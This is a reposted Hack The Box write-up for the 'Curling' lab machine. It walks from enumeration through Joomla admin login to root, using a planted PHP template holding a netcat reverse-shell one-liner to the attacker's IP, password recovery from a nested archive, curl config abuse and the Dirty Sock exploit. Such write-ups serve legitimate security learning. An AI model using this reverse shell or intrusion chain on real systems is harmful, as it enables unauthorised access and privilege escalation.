41
Hack The Box - Curling
source link: https://www.tuicool.com/articles/hit/jEbueue
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Quick Summary
Hey guys today Curling retired and here is my write-up about it. I had a lot of fun doing this box as it was easy and simple. Also it was straightforward , no rabbit holes and such things. It’s a linux box and its ip is 10.10.10.150
I added it to /etc/hosts
as curling.htb
. Let’s jump right in !
Nmap
As always we will start with nmap to scan for open ports and services :
nmap -sV -sT -sC curling.htb
We only get 2 open ports , 80 running http and 22 running ssh. Let’s look at http.
HTTP Initial Enumeration
We see a blog titled “Cewl Curling site!” , and it’s joomla . At this point I would run joomscan
but I wanted to do some manual enumeration first , so I checked the source of the page and at the end of the body I found this comment :
So I checked /secret.txt
and found this base64
string :
Decoding :
Curling2018!
we can use that as a password. But what is the username ? If we take a look at the main page again and read the posts :
We will notice a name in one of the posts : Floris
, now we can try to login as floris
with the password Curling2018!
:
And it worked. While I was doing this enumeration I ran gobuster in the background and got these results :
/.htpasswd (Status: 403) /.hta (Status: 403) /administrator (Status: 301) /.htaccess (Status: 403) /bin (Status: 301) /cache (Status: 301) /components (Status: 301) /images (Status: 301) /includes (Status: 301) /index.php (Status: 200) /language (Status: 301) /layouts (Status: 301) /libraries (Status: 301) /media (Status: 301) /modules (Status: 301) /plugins (Status: 301) /server-status (Status: 403) /templates (Status: 301) /tmp (Status: 301)
Let’s go to /administrator
and login to the administration panel :
Editing Template Files and Getting a Reverse Shell :
On the configuration section there’s an option for templates :
By going to that we notice that protostar is the default style and template :
From templates we will go to Protostar Details and Files
and create a new php
file :
In the php file we will execute a system command to get a reverse shell :
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f'); ?>
After we save the file we will go to http://curling.htb/templates/protostar/file.php
Then we check our listener :
User
We got a reverse shell as www-data
, in the /home
directory there’s a directory for floris
:
We don’t have read access to user.txt
, but we notice a file called password_backup
, by looking at that file :
It’s a hex dump
file , So I copied it to my box to reverse it :
To reverse a hex dump
file we will use xxd
, so xxd -r pw_backup
:
Not a normal output , let’s redirect the output to a file and see :
So what happened is , it turned out to be a bzip2
file so I decompressed it then got a new gzip
file , decompressed it and got another bzip2
file , after decompression I got a tar
file , then finally a txt
file for the password :
Let’s ssh
as floris
:
And we owned user !
Curling
By looking at the /home
directory of floris
again :
There’s a directory called admin-area
which contains two files :
input
and report
input
:
url = "http://127.0.0.1"
report
:
It’s obvious that this is the output of executing curl
on http://127.0.0.1
:
Even the name of the box is a hint curling
, so what about changing that url
from localhost
to something else like a file ? Next time the command gets executed we will get the contents of that file , maybe root.txt
? But only if it’s getting executed by root
. Let’s try and see if it will work :
Then we will do : watch cat report
, this is executing cat report
every 2 seconds and giving us the output , easier than checking manually :
After some time we get the flag.
Dirty Sock ? Root shell !
I didn’t like the fact that I could only read the flag , I wanted a root
shell. So I tried for a long time to bypass the url
thing and get a reverse shell , but couldn’t. Then when I did this box again for the write-up , one of the things that caught my attention is that we are on an ubuntu
box , so I checked snap
version to know if it’s vulnerable to CVE-2019-7304
known as Dirty Sock
and of course it was :
This is not intended at all because by the time this box was released , CVE-2019-7304
wasn’t disclosed yet.
I got the exploit from here , Then hosted it on a python simple http server and downloaded it on the box :
python3 dirty_sockv2.py
Now we can su
to dirty_sock
and execute commands as root :
Or just sudo su
and we will get a root shell :
We owned root !
That’s it , Feedback is appreciated !
Don’t forget to read theprevious write-ups , Tweet about the write-up if you liked it , follow on twitter for awesome resources @Ahm3d_H3sham
Thanks for reading.
Previous Hack The Box write-up : Hack The Box - Frolic
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK